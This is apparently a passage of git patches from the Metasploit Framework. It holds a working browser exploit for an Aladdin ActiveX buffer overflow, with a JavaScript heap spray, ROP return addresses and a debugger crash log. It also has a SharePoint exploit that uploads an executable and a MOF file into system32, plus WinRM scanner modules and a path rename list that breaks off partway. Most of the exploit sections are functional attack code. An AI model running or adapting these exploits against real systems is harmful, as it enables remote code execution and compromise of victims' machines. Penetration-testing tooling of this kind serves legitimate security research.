OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}", + :method => "ChooseFilePath", + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability found in Aladdin Knowledge System's + ActiveX component. By supplying a long string of data to the ChooseFilePath() + function, a buffer overflow occurs, which may result in remote code execution + under the context of the user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'b33f', #Original + 'sinn3r' #Metasploit + ], + 'References' => + [ + [ 'OSVDB', '86723' ], + [ 'EDB', '22301' ] + ], + 'Payload' => + { + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4' } ], + [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4' } ], + [ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4' } ], + [ 'IE 7 on Windows Vista', { 'Offset' => '0x5f4' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def load_exploit_html(my_target, cli) + p = payload.encoded + spray = ie_heap_spray(my_target, p) + + html = %Q| + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + +=begin +0:008> g +(82c.12dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8 +eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +OLEAUT32!SysReAllocStringLen+0x31: +7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=???????? +0:008> g +(82c.12dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 +eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +0c0c0c0c ?? ??? +0:008> db 020bf798 +020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +=end \ No newline at end of file From 91e6b7cd288b05cbc1ee5e5e0d974572077446e6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 11:57:38 +0100 Subject: [PATCH 40/64] added ie8 target --- .../browser/aladdin_choosefilepath_bof.rb | 57 +++++++++++++++---- 1 file changed, 45 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 9e93d651d3..7a50c7446d 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -12,11 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn + include Msf::Exploit::RopDb autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", - :ua_maxver => "7.0", + :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank, @@ -37,12 +38,15 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'b33f', #Original - 'sinn3r' #Metasploit + 'shinnai', #Vulnerability Discovery + 'b33f', #Original exploit + 'sinn3r', #Metasploit + 'juan vazquez' #Metasploit, IE8 target ], 'References' => [ [ 'OSVDB', '86723' ], + [ 'EDB', '22258' ], [ 'EDB', '22301' ] ], 'Payload' => @@ -57,10 +61,34 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Automatic', {} ], - [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4' } ], - [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4' } ], - [ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4' } ], - [ 'IE 7 on Windows Vista', { 'Offset' => '0x5f4' } ] + [ 'IE 6 on Windows XP SP3', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ], + [ 'IE 7 on Windows XP SP3', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ], + [ 'IE 8 on Windows XP SP3', + { + 'Rop' => true, + 'Offset' => '0x5f6', + 'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll + } + ], + [ 'IE 7 on Windows Vista', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 1 2012", @@ -104,7 +132,6 @@ class Metasploit3 < Msf::Exploit::Remote def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) - js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c @@ -135,7 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote end def load_exploit_html(my_target, cli) - p = payload.encoded + + if my_target['Rop'] + p = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) + else + p = payload.encoded + end + spray = ie_heap_spray(my_target, p) html = %Q| @@ -144,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote | From ef0f415c51c4df083a29211e0f0179d374a9f3ab Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 17:46:57 +0100 Subject: [PATCH 41/64] related to #980 adds support for HttpClient --- .../windows/misc/ms10_104_sharepoint.rb | 37 ++++++++----------- 1 file changed, 15 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 4791d63fee..c34c423477 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -10,7 +10,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::WbemExec @@ -89,24 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote soap_convert_file << "" << "\x0d\x0a" soap_convert_file << "" << "\x0d\x0a" - http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a" - http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a" - http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a" - http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a" - http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a" - http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a" - http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a" - - connect - sock.put(http_request << soap_convert_file) - data = "" - read_data = sock.get_once(-1, 1) - while not read_data.nil? - data << read_data - read_data = sock.get_once(-1, 1) - end - disconnect - return data + res = send_request_cgi({ + 'uri' => '/HtmlTrLauncher', + 'method' => 'POST', + 'ctype' => 'text/xml; charset="utf-8"', + 'headers' => + { + 'SOAPAction' => '"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile"', + }, + 'data' => soap_convert_file + }) + return res end # The check tries to create a test file in the root @@ -119,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe @@ -138,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ print_good("#{peer} - #{exe_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{exe_name}") @@ -147,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ print_good("#{peer} - #{mof_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{mof_name}") From c5262a3e6419b886629863415c2168e2956346e8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:11:00 -0500 Subject: [PATCH 42/64] Update the description about AllowUnencrypted --- modules/auxiliary/scanner/winrm/winrm_login.rb | 10 ++++++++-- modules/auxiliary/scanner/winrm/winrm_wql.rb | 14 +++++++++++--- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 198bdd83d6..146a863da1 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. - Kerberos is not currently supported. - }, + Kerberos is not currently supported. Please note: in order to use this + module, the 'AllowUnencrypted' winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'References' => [ @@ -77,3 +78,8 @@ class Metasploit3 < Msf::Auxiliary end end + +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 8cb82a2db9..5cbdc5452d 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -29,7 +29,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. - }, + Please note in order to use this module, the 'AllowUnencrypted' + winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'License' => MSF_LICENSE ) @@ -69,6 +71,12 @@ class Metasploit3 < Msf::Auxiliary print_status "Results saved to #{path}" end - - end + +=begin +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end + +=end \ No newline at end of file From 834d9028cdff02453001f966822d5f553195922d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:13:21 -0500 Subject: [PATCH 43/64] Fix syntax error --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 5cbdc5452d..31fabd59ec 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -73,10 +73,7 @@ class Metasploit3 < Msf::Auxiliary end -=begin =begin To set the AllowUncrypted option: winrm set winrm/config/service @{AllowUnencrypted="true"} =end - -=end \ No newline at end of file From 09195ad9a75e60a9e8391ea521ebc6f4b0785525 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 09:13:55 -0500 Subject: [PATCH 44/64] Adds the WQL execution module --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 69 ++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/scanner/winrm/winrm_wql.rb diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb new file mode 100644 index 0000000000..cb33fdb476 --- /dev/null +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -0,0 +1,69 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' +require 'rex/proto/ntlm/message' + + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::WinRM + include Msf::Auxiliary::Report + + + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'WinRM WQL Query Runner', + 'Version' => '$Revision$', + 'Description' => %q{ + This module runs WQL queries against remote WinRM Services. + Authentication is required. Currently only works with NTLM auth. + }, + 'Author' => [ 'thelightcosine' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('WQL', [ true, "The WQL query to run", "Select Name,Status from Win32_Service" ]), + OptString.new('USERNAME', [ true, "The username to authenticate as"]), + OptString.new('PASSWORD', [ true, "The password to authenticate with"]) + ], self.class) + end + + + def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end + + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if resp.code == 401 + print_error "Login Failure! Recheck the supplied credentials." + return + end + + unless resp.code == 200 + print_error "Got unexpected response from #{ip}: \n #{resp.to_s}" + return + end + resp_tbl = parse_wql_response(resp) + print_good resp_tbl.to_s + store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + end + + + +end From 8711484438a36cfb9a17eb1a72784e32e2c5c36d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 11:08:57 -0500 Subject: [PATCH 45/64] minor fixups --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index cb33fdb476..8cb82a2db9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'WinRM WQL Query Runner', 'Version' => '$Revision$', 'Description' => %q{ - This module runs WQL queries against remote WinRM Services. + This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. }, 'Author' => [ 'thelightcosine' ], @@ -48,8 +48,12 @@ class Metasploit3 < Msf::Auxiliary print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" return end - + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if resp.nil? + print_error "Got no reply from the server" + return + end if resp.code == 401 print_error "Login Failure! Recheck the supplied credentials." return @@ -61,7 +65,8 @@ class Metasploit3 < Msf::Auxiliary end resp_tbl = parse_wql_response(resp) print_good resp_tbl.to_s - store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + path = store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + print_status "Results saved to #{path}" end From 98c1272b924f162afce096ad9f463280c6a51158 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:11:00 -0500 Subject: [PATCH 46/64] Update the description about AllowUnencrypted --- modules/auxiliary/scanner/winrm/winrm_login.rb | 10 ++++++++-- modules/auxiliary/scanner/winrm/winrm_wql.rb | 14 +++++++++++--- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 198bdd83d6..146a863da1 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. - Kerberos is not currently supported. - }, + Kerberos is not currently supported. Please note: in order to use this + module, the 'AllowUnencrypted' winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'References' => [ @@ -77,3 +78,8 @@ class Metasploit3 < Msf::Auxiliary end end + +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 8cb82a2db9..5cbdc5452d 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -29,7 +29,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. - }, + Please note in order to use this module, the 'AllowUnencrypted' + winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'License' => MSF_LICENSE ) @@ -69,6 +71,12 @@ class Metasploit3 < Msf::Auxiliary print_status "Results saved to #{path}" end - - end + +=begin +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end + +=end \ No newline at end of file From 9736d352300557fe52f6b66f84912bb567593a30 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:13:21 -0500 Subject: [PATCH 47/64] Fix syntax error --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 5cbdc5452d..31fabd59ec 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -73,10 +73,7 @@ class Metasploit3 < Msf::Auxiliary end -=begin =begin To set the AllowUncrypted option: winrm set winrm/config/service @{AllowUnencrypted="true"} =end - -=end \ No newline at end of file From 6aed38f30919de89fa20a2431a872e0b3656d1c3 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 1 Nov 2012 08:39:18 -0500 Subject: [PATCH 48/64] Update metasploit_data_models paths for version 0.3.0 --- .../.gitignore | 0 .../.rspec | 0 .../Gemfile | 0 .../LICENSE | 0 .../README.mdown | 0 .../Rakefile | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../lib/metasploit_data_models.rb | 0 .../lib/metasploit_data_models/active_record_models/api_key.rb | 0 .../lib/metasploit_data_models/active_record_models/client.rb | 0 .../lib/metasploit_data_models/active_record_models/cred.rb | 0 .../lib/metasploit_data_models/active_record_models/cred_file.rb | 0 .../lib/metasploit_data_models/active_record_models/event.rb | 0 .../active_record_models/exploit_attempt.rb | 0 .../metasploit_data_models/active_record_models/exploited_host.rb | 0 .../lib/metasploit_data_models/active_record_models/host.rb | 0 .../metasploit_data_models/active_record_models/host_detail.rb | 0 .../lib/metasploit_data_models/active_record_models/host_tag.rb | 0 .../metasploit_data_models/active_record_models/imported_cred.rb | 0 .../lib/metasploit_data_models/active_record_models/listener.rb | 0 .../lib/metasploit_data_models/active_record_models/loot.rb | 0 .../lib/metasploit_data_models/active_record_models/macro.rb | 0 .../lib/metasploit_data_models/active_record_models/mod_ref.rb | 0 .../metasploit_data_models/active_record_models/module_action.rb | 0 .../metasploit_data_models/active_record_models/module_arch.rb | 0 .../metasploit_data_models/active_record_models/module_author.rb | 0 .../metasploit_data_models/active_record_models/module_detail.rb | 0 .../metasploit_data_models/active_record_models/module_mixin.rb | 0 .../active_record_models/module_platform.rb | 0 .../lib/metasploit_data_models/active_record_models/module_ref.rb | 0 .../metasploit_data_models/active_record_models/module_target.rb | 0 .../active_record_models/nexpose_console.rb | 0 .../lib/metasploit_data_models/active_record_models/note.rb | 0 .../lib/metasploit_data_models/active_record_models/profile.rb | 0 .../lib/metasploit_data_models/active_record_models/ref.rb | 0 .../lib/metasploit_data_models/active_record_models/report.rb | 0 .../active_record_models/report_template.rb | 0 .../lib/metasploit_data_models/active_record_models/route.rb | 0 .../lib/metasploit_data_models/active_record_models/service.rb | 0 .../lib/metasploit_data_models/active_record_models/session.rb | 0 .../metasploit_data_models/active_record_models/session_event.rb | 0 .../lib/metasploit_data_models/active_record_models/tag.rb | 0 .../lib/metasploit_data_models/active_record_models/task.rb | 0 .../lib/metasploit_data_models/active_record_models/user.rb | 0 .../lib/metasploit_data_models/active_record_models/vuln.rb | 0 .../metasploit_data_models/active_record_models/vuln_attempt.rb | 0 .../metasploit_data_models/active_record_models/vuln_detail.rb | 0 .../lib/metasploit_data_models/active_record_models/vuln_ref.rb | 0 .../lib/metasploit_data_models/active_record_models/web_form.rb | 0 .../lib/metasploit_data_models/active_record_models/web_page.rb | 0 .../lib/metasploit_data_models/active_record_models/web_site.rb | 0 .../lib/metasploit_data_models/active_record_models/web_vuln.rb | 0 .../metasploit_data_models/active_record_models/wmap_request.rb | 0 .../metasploit_data_models/active_record_models/wmap_target.rb | 0 .../lib/metasploit_data_models/active_record_models/workspace.rb | 0 .../lib/metasploit_data_models/base64_serializer.rb | 0 .../lib/metasploit_data_models/serialized_prefs.rb | 0 .../lib/metasploit_data_models/validators/ip_format_validator.rb | 0 .../validators/password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 0 .../metasploit_data_models.gemspec | 0 .../metasploit_data_models_live.gemspec | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 0 ...s-0.0.2.43DEV.gemspec => metasploit_data_models-0.3.0.gemspec} | 0 66 files changed, 0 insertions(+), 0 deletions(-) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/.gitignore (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/.rspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/Gemfile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/README.mdown (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/console_db.yml (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/cred_file.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => 